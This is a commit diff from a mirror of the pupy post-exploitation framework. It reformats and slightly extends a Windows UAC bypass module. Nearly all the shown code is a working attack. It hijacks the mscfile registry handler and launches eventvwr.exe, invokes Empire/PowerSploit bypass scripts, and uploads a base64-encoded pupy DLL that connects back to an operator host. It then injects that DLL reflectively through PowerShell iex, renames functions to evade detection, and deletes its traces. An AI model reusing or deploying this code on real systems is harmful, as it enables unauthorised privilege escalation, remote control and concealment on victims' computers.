Rooba
/
pupy
mirror of https://github.com/n1nj4sec/pupy.git
1
1
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Print help msg if bypassuac failed + tabs to spaces

This commit is contained in:
quentinhardy 2016-11-03 06:59:03 -04:00
parent e3be286656
commit c874523600
3 changed files with 183 additions and 180 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

48
pupy/modules/bypassuac.py
View File

@ -20,30 +20,30 @@ class BypassUAC(PupyModule):
self.arg_parser.add_argument('-m', dest='method', choices=["eventvwr", "dll_hijacking"], default=None, help="Default: the technic will be choosen for you. 'dll_hijacking' for wind7-8.1 and 'eventvwr' for wind7-10.")
def run(self, args):
# check if a UAC Bypass can be done
if not self.client.conn.modules["pupwinutils.security"].can_get_admin_access():
self.error('Your are not on the local administrator group.')
return
# check if a UAC Bypass can be done
if not self.client.conn.modules["pupwinutils.security"].can_get_admin_access():
self.error('Your are not on the local administrator group.')
return
dll_hijacking = False
registry_hijacking = False
dll_hijacking = False
registry_hijacking = False
bypassUasModule = bypassuac(self, rootPupyPath=ROOT)
# choose methods depending on the OS Version
if not args.method:
if self.client.desc['release'] == '10':
registry_hijacking = True
else:
dll_hijacking = True
elif args.method == "eventvwr":
registry_hijacking = True
else:
dll_hijacking = True
bypassUasModule = bypassuac(self, rootPupyPath=ROOT)
# choose methods depending on the OS Version
if not args.method:
if self.client.desc['release'] == '10':
registry_hijacking = True
else:
dll_hijacking = True
elif args.method == "eventvwr":
registry_hijacking = True
else:
dll_hijacking = True
if registry_hijacking:
self.success("Trying to bypass UAC using the Eventvwr method, wind7-10 targets...")
bypassUasModule.bypassuac_through_EventVwrBypass()
elif dll_hijacking:
# Invoke-BypassUAC.ps1 uses different technics to bypass depending on the Windows Version (Sysprep for Windows 7/2008 and NTWDBLIB.dll for Windows 8/2012)
self.success("Trying to bypass UAC using DLL Hijacking, wind7-8.1 targets...")
bypassUasModule.bypassuac_through_PowerSploitBypassUAC()
if registry_hijacking:
self.success("Trying to bypass UAC using the Eventvwr method, wind7-10 targets...")
bypassUasModule.bypassuac_through_EventVwrBypass()
elif dll_hijacking:
# Invoke-BypassUAC.ps1 uses different technics to bypass depending on the Windows Version (Sysprep for Windows 7/2008 and NTWDBLIB.dll for Windows 8/2012)
self.success("Trying to bypass UAC using DLL Hijacking, wind7-8.1 targets...")
bypassUasModule.bypassuac_through_PowerSploitBypassUAC()

233
pupy/modules/lib/windows/bypassuac.py
View File

@ -15,122 +15,125 @@ import random, string
from pupylib.utils.rpyc_utils import redirected_stdo
class bypassuac():
def __init__(self, module, rootPupyPath):
self.module = module
self.module.client.load_package("pupwinutils.bypassuac_remote")
def __init__(self, module, rootPupyPath):
self.module = module
self.module.client.load_package("pupwinutils.bypassuac_remote")
#Remote paths
remoteTempFolder, systemRoot = self.module.client.conn.modules["pupwinutils.bypassuac_remote"].get_env_variables()
self.invokeReflectivePEInjectionRemotePath = "{temp}{random}{ext}".format(temp=remoteTempFolder, random=next(_get_candidate_names()), ext='.txt')
self.mainPowershellScriptRemotePath = "{temp}{random}{ext}".format(temp=remoteTempFolder, random=next(_get_candidate_names()), ext='.ps1')
self.pupyDLLRemotePath = "{temp}{random}{ext}".format(temp=remoteTempFolder, random=next(_get_candidate_names()), ext='.txt')
self.invokeBypassUACRemotePath = "{temp}{random}{ext}".format(temp=remoteTempFolder, random=next(_get_candidate_names()), ext='.ps1')
#Adding obfuscation on ps1 main function
self.bypassUAC_random_name = ''.join(random.SystemRandom().choice(string.ascii_uppercase + string.digits) for _ in range(7))
self.reflectivePE_random_name = ''.join(random.SystemRandom().choice(string.ascii_uppercase + string.digits) for _ in range(7))
#Remote paths
remoteTempFolder, systemRoot = self.module.client.conn.modules["pupwinutils.bypassuac_remote"].get_env_variables()
self.invokeReflectivePEInjectionRemotePath = "{temp}{random}{ext}".format(temp=remoteTempFolder, random=next(_get_candidate_names()), ext='.txt')
self.mainPowershellScriptRemotePath = "{temp}{random}{ext}".format(temp=remoteTempFolder, random=next(_get_candidate_names()), ext='.ps1')
self.pupyDLLRemotePath = "{temp}{random}{ext}".format(temp=remoteTempFolder, random=next(_get_candidate_names()), ext='.txt')
self.invokeBypassUACRemotePath = "{temp}{random}{ext}".format(temp=remoteTempFolder, random=next(_get_candidate_names()), ext='.ps1')
#Adding obfuscation on ps1 main function
self.bypassUAC_random_name = ''.join(random.SystemRandom().choice(string.ascii_uppercase + string.digits) for _ in range(7))
self.reflectivePE_random_name = ''.join(random.SystemRandom().choice(string.ascii_uppercase + string.digits) for _ in range(7))
#Define Local paths
self.pupyDLLLocalPath = os.path.join(gettempdir(),'dllFile.txt')
self.mainPowerShellScriptPrivilegedLocalPath = os.path.join(gettempdir(),'mainPowerShellScriptPrivileged.txt')
self.invokeReflectivePEInjectionLocalPath = os.path.join(rootPupyPath,"pupy", "external", "PowerSploit", "CodeExecution", "Invoke-ReflectivePEInjection.ps1")
self.invokeBypassUACLocalPath = os.path.join(rootPupyPath, "pupy", "external", "Empire", "privesc", "Invoke-BypassUAC.ps1")
def bypassuac_through_EventVwrBypass(self):
# '''
# Based on Invoke-EventVwrBypass, thanks to enigma0x3 (https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/)
# '''
# On a Windows 10 "C:\Windows\SysNative\WindowsPowerShell\v1.0\powershell.exe" does not exist, we cannot force to use a x64 bit powershell interpreter
# The pupy dll upload will be a 32 bit
if '64' in self.module.client.desc['proc_arch']:
upload_x86_dll = False
else:
upload_x86_dll = True
self.module.info('Uploading temporary files')
self.uploadPupyDLL(force_x86_dll=upload_x86_dll)
self.uploadPowershellScripts()
files_to_delete=[self.invokeReflectivePEInjectionRemotePath, self.mainPowershellScriptRemotePath, self.pupyDLLRemotePath]
self.module.info('Altering the registry')
self.module.client.conn.modules["pupwinutils.bypassuac_remote"].registry_hijacking(self.mainPowershellScriptRemotePath, files_to_delete)
self.module.success("Waiting for a connection from the DLL (take few seconds)...")
def bypassuac_through_PowerSploitBypassUAC(self):
'''
Performs a bypass UAC attack by utilizing the powersloit UACBypass script (wind7 to 8.1)
'''
#Constants
bypassUACcmd = "{InvokeBypassUAC} -Command 'powershell.exe -ExecutionPolicy Bypass -file {mainPowershell} -Verbose'".format(InvokeBypassUAC=self.bypassUAC_random_name, mainPowershell=self.mainPowershellScriptRemotePath)
self.module.info('Uploading temporary files')
self.uploadPowershellScripts()
self.uploadPupyDLL()
content = re.sub("Write-Verbose ","Write-Output ", open(self.invokeBypassUACLocalPath, 'r').read(), flags=re.I)
content = re.sub("Invoke-BypassUAC", self.bypassUAC_random_name, content, flags=re.I)
logging.debug("Starting BypassUAC script with the following cmd: {0}".format(bypassUACcmd))
self.module.info('Starting the UAC Bypass process')
output = execute_powershell_script(self.module, content, bypassUACcmd, x64IfPossible=True)
logging.debug("BypassUAC script output: %s\n"%(output))
if "DLL injection complete!" in output:
self.module.success("UAC bypassed")
else:
self.module.warning("Impossible to know what's happened remotely. You should active debug mode.")
#Clean tmp files
tmp_files = [self.invokeReflectivePEInjectionRemotePath, self.mainPowershellScriptRemotePath, self.invokeBypassUACRemotePath, self.pupyDLLRemotePath]
logging.debug("Deleting temporary files")
self.module.client.conn.modules["pupwinutils.bypassuac_remote"].deleteTHisRemoteFile(tmp_files)
#...
self.module.success("Waiting for a connection from the DLL (take few seconds)...")
def uploadPowershellScripts(self):
'''
Upload main powershell script and invokeReflectivePEInjection script
'''
mainPowerShellScriptPrivileged = """
cat {invoke_reflective_pe_injection} | Out-String | iex
cat {pupy_dll} | Out-String | iex
{InvokeReflectivePEInjection} -PEBytes $PEBytes -ForceASLR
""".format(invoke_reflective_pe_injection=self.invokeReflectivePEInjectionRemotePath, pupy_dll=self.pupyDLLRemotePath, InvokeReflectivePEInjection=self.reflectivePE_random_name)
logging.debug("Creating the Powershell script in %s locally"%(self.mainPowerShellScriptPrivilegedLocalPath))
with open(self.mainPowerShellScriptPrivilegedLocalPath, 'w+') as w:
w.write(mainPowerShellScriptPrivileged)
logging.debug("Uploading powershell code for DLL injection in {0}".format(self.invokeReflectivePEInjectionRemotePath))
content = re.sub("Invoke-ReflectivePEInjection", self.reflectivePE_random_name, open(self.invokeReflectivePEInjectionLocalPath).read(), flags=re.I)
tmp_file = os.path.join(gettempdir(),'reflective_pe.txt')
with open(tmp_file, 'w+') as w:
w.write(content)
upload(self.module.client.conn, tmp_file, self.invokeReflectivePEInjectionRemotePath)
logging.debug("Uploading main powershell script executed by BypassUAC in {0}".format(self.mainPowershellScriptRemotePath))
upload(self.module.client.conn, self.mainPowerShellScriptPrivilegedLocalPath, self.mainPowershellScriptRemotePath)
#Define Local paths
self.pupyDLLLocalPath = os.path.join(gettempdir(),'dllFile.txt')
self.mainPowerShellScriptPrivilegedLocalPath = os.path.join(gettempdir(),'mainPowerShellScriptPrivileged.txt')
self.invokeReflectivePEInjectionLocalPath = os.path.join(rootPupyPath,"pupy", "external", "PowerSploit", "CodeExecution", "Invoke-ReflectivePEInjection.ps1")
self.invokeBypassUACLocalPath = os.path.join(rootPupyPath, "pupy", "external", "Empire", "privesc", "Invoke-BypassUAC.ps1")
def bypassuac_through_EventVwrBypass(self):
# '''
# Based on Invoke-EventVwrBypass, thanks to enigma0x3 (https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/)
# '''
# On a Windows 10 "C:\Windows\SysNative\WindowsPowerShell\v1.0\powershell.exe" does not exist, we cannot force to use a x64 bit powershell interpreter
# The pupy dll upload will be a 32 bit
print repr(self.module.client.desc)
if '64' in self.module.client.desc['proc_arch']:
upload_x86_dll = False
else:
upload_x86_dll = True
self.module.info('Uploading temporary files')
self.uploadPupyDLL(force_x86_dll=upload_x86_dll)
self.uploadPowershellScripts()
files_to_delete=[self.invokeReflectivePEInjectionRemotePath, self.mainPowershellScriptRemotePath, self.pupyDLLRemotePath]
self.module.info('Altering the registry')
self.module.client.conn.modules["pupwinutils.bypassuac_remote"].registry_hijacking(self.mainPowershellScriptRemotePath, files_to_delete)
self.module.success("Waiting for a connection from the DLL (take few seconds)...")
self.module.success("If nothing happened, try to migrate to another process and try again.")
def bypassuac_through_PowerSploitBypassUAC(self):
'''
Performs a bypass UAC attack by utilizing the powersloit UACBypass script (wind7 to 8.1)
'''
#Constants
bypassUACcmd = "{InvokeBypassUAC} -Command 'powershell.exe -ExecutionPolicy Bypass -file {mainPowershell} -Verbose'".format(InvokeBypassUAC=self.bypassUAC_random_name, mainPowershell=self.mainPowershellScriptRemotePath)
self.module.info('Uploading temporary files')
self.uploadPowershellScripts()
self.uploadPupyDLL()
content = re.sub("Write-Verbose ","Write-Output ", open(self.invokeBypassUACLocalPath, 'r').read(), flags=re.I)
content = re.sub("Invoke-BypassUAC", self.bypassUAC_random_name, content, flags=re.I)
logging.debug("Starting BypassUAC script with the following cmd: {0}".format(bypassUACcmd))
self.module.info('Starting the UAC Bypass process')
output = execute_powershell_script(self.module, content, bypassUACcmd, x64IfPossible=True)
logging.debug("BypassUAC script output: %s\n"%(output))
if "DLL injection complete!" in output:
self.module.success("UAC bypassed")
else:
self.module.warning("Impossible to know what's happened remotely. You should active debug mode.")
#Clean tmp files
tmp_files = [self.invokeReflectivePEInjectionRemotePath, self.mainPowershellScriptRemotePath, self.invokeBypassUACRemotePath, self.pupyDLLRemotePath]
logging.debug("Deleting temporary files")
self.module.client.conn.modules["pupwinutils.bypassuac_remote"].deleteTHisRemoteFile(tmp_files)
#...
self.module.success("Waiting for a connection from the DLL (take few seconds)...")
self.module.success("If nothing happened, try to migrate to another process and try again.")
def uploadPowershellScripts(self):
'''
Upload main powershell script and invokeReflectivePEInjection script
'''
mainPowerShellScriptPrivileged = """
cat {invoke_reflective_pe_injection} | Out-String | iex
cat {pupy_dll} | Out-String | iex
{InvokeReflectivePEInjection} -PEBytes $PEBytes -ForceASLR
""".format(invoke_reflective_pe_injection=self.invokeReflectivePEInjectionRemotePath, pupy_dll=self.pupyDLLRemotePath, InvokeReflectivePEInjection=self.reflectivePE_random_name)
logging.debug("Creating the Powershell script in %s locally"%(self.mainPowerShellScriptPrivilegedLocalPath))
with open(self.mainPowerShellScriptPrivilegedLocalPath, 'w+') as w:
w.write(mainPowerShellScriptPrivileged)
logging.debug("Uploading powershell code for DLL injection in {0}".format(self.invokeReflectivePEInjectionRemotePath))
content = re.sub("Invoke-ReflectivePEInjection", self.reflectivePE_random_name, open(self.invokeReflectivePEInjectionLocalPath).read(), flags=re.I)
tmp_file = os.path.join(gettempdir(),'reflective_pe.txt')
with open(tmp_file, 'w+') as w:
w.write(content)
upload(self.module.client.conn, tmp_file, self.invokeReflectivePEInjectionRemotePath)
logging.debug("Uploading main powershell script executed by BypassUAC in {0}".format(self.mainPowershellScriptRemotePath))
upload(self.module.client.conn, self.mainPowerShellScriptPrivilegedLocalPath, self.mainPowershellScriptRemotePath)
def uploadPupyDLL(self, force_x86_dll=False):
'''
Upload pupy dll as a txt file
'''
res=self.module.client.conn.modules['pupy'].get_connect_back_host()
host, port = res.rsplit(':',1)
logging.debug("Address configured is %s:%s for pupy dll..."%(host,port))
logging.debug("Looking for process architecture...")
def uploadPupyDLL(self, force_x86_dll=False):
'''
Upload pupy dll as a txt file
'''
res=self.module.client.conn.modules['pupy'].get_connect_back_host()
host, port = res.rsplit(':',1)
logging.debug("Address configured is %s:%s for pupy dll..."%(host,port))
logging.debug("Looking for process architecture...")
if "64" in self.module.client.desc["os_arch"] and not force_x86_dll:
logging.debug("Target achitecture is x64, using a x64 dll")
dllbuff=pupygen.get_edit_pupyx64_dll(self.module.client.get_conf())
else:
logging.debug("Target achitecture is x86, using a x86 dll")
dllbuff=pupygen.get_edit_pupyx86_dll(self.module.client.get_conf())
logging.debug("Creating the pupy dll in %s locally"%(self.pupyDLLLocalPath))
with open(self.pupyDLLLocalPath, 'w+') as w:
w.write('$PEBytes = [System.Convert]::FromBase64String("%s")'%(base64.b64encode(dllbuff)))
logging.debug("Uploading pupy dll in {0}".format(self.pupyDLLRemotePath))
upload(self.module.client.conn, self.pupyDLLLocalPath, self.pupyDLLRemotePath)
if "64" in self.module.client.desc["os_arch"] and not force_x86_dll:
logging.debug("Target achitecture is x64, using a x64 dll")
dllbuff=pupygen.get_edit_pupyx64_dll(self.module.client.get_conf())
else:
logging.debug("Target achitecture is x86, using a x86 dll")
dllbuff=pupygen.get_edit_pupyx86_dll(self.module.client.get_conf())
logging.debug("Creating the pupy dll in %s locally"%(self.pupyDLLLocalPath))
with open(self.pupyDLLLocalPath, 'w+') as w:
w.write('$PEBytes = [System.Convert]::FromBase64String("%s")'%(base64.b64encode(dllbuff)))
logging.debug("Uploading pupy dll in {0}".format(self.pupyDLLRemotePath))
upload(self.module.client.conn, self.pupyDLLLocalPath, self.pupyDLLRemotePath)

82
pupy/packages/windows/all/pupwinutils/bypassuac_remote.py
View File

@ -4,51 +4,51 @@ import subprocess
from _winreg import *
def deleteTHisRemoteFile(tmp_files):
for file in tmp_files:
try:
os.remove(file)
except Exception, e:
pass
for file in tmp_files:
try:
os.remove(file)
except Exception, e:
pass
def get_env_variables():
try:
tmp = os.path.expandvars("%TEMP%")
except:
tmp = os.path.expandvars("%APPDATA%")
sysroot = os.path.expandvars("%SYSTEMROOT%")
return tmp, sysroot
try:
tmp = os.path.expandvars("%TEMP%")
except:
tmp = os.path.expandvars("%APPDATA%")
sysroot = os.path.expandvars("%SYSTEMROOT%")
return tmp, sysroot
def registry_hijacking(mainPowershellScriptRemotePath, files_to_delete):
# '''
# Based on Invoke-EventVwrBypass, thanks to enigma0x3 (https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/)
# '''
HKCU = ConnectRegistry(None, HKEY_CURRENT_USER)
powershellPath = '%s\\system32\\WindowsPowerShell\\v1.0\\powershell.exe' % os.path.expandvars("%SYSTEMROOT%")
mscCmdPath = "Software\Classes\mscfile\shell\open\command"
cmd = "{1} -ExecutionPolicy Bypass -File {0}".format(mainPowershellScriptRemotePath, powershellPath)
try:
# The registry key already exist in HKCU, altering...
key = OpenKey(HKCU, mscCmdPath, KEY_SET_VALUE)
except:
# Adding the registry key in HKCU
key = CreateKey(HKCU, mscCmdPath)
# '''
# Based on Invoke-EventVwrBypass, thanks to enigma0x3 (https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/)
# '''
HKCU = ConnectRegistry(None, HKEY_CURRENT_USER)
powershellPath = '%s\\system32\\WindowsPowerShell\\v1.0\\powershell.exe' % os.path.expandvars("%SYSTEMROOT%")
mscCmdPath = "Software\Classes\mscfile\shell\open\command"
cmd = "{1} -ExecutionPolicy Bypass -File {0}".format(mainPowershellScriptRemotePath, powershellPath)
try:
# The registry key already exist in HKCU, altering...
key = OpenKey(HKCU, mscCmdPath, KEY_SET_VALUE)
except:
# Adding the registry key in HKCU
key = CreateKey(HKCU, mscCmdPath)
registry_key = OpenKey(HKCU, mscCmdPath, 0, KEY_WRITE)
SetValueEx(registry_key, '', 0, REG_SZ, cmd)
CloseKey(registry_key)
# Executing eventvwr.exe
eventvwrPath = os.path.join(os.environ['WINDIR'],'System32','eventvwr.exe')
output = subprocess.check_output(eventvwrPath, stderr=subprocess.STDOUT, stdin=subprocess.PIPE, shell = True)
registry_key = OpenKey(HKCU, mscCmdPath, 0, KEY_WRITE)
SetValueEx(registry_key, '', 0, REG_SZ, cmd)
CloseKey(registry_key)
# Executing eventvwr.exe
eventvwrPath = os.path.join(os.environ['WINDIR'],'System32','eventvwr.exe')
output = subprocess.check_output(eventvwrPath, stderr=subprocess.STDOUT, stdin=subprocess.PIPE, shell = True)
# Sleeping 5 secds...
time.sleep(5)
#Clean everything
DeleteKey(HKCU, mscCmdPath)
deleteTHisRemoteFile(files_to_delete)
# Sleeping 5 secds...
time.sleep(5)
#Clean everything
DeleteKey(HKCU, mscCmdPath)
deleteTHisRemoteFile(files_to_delete)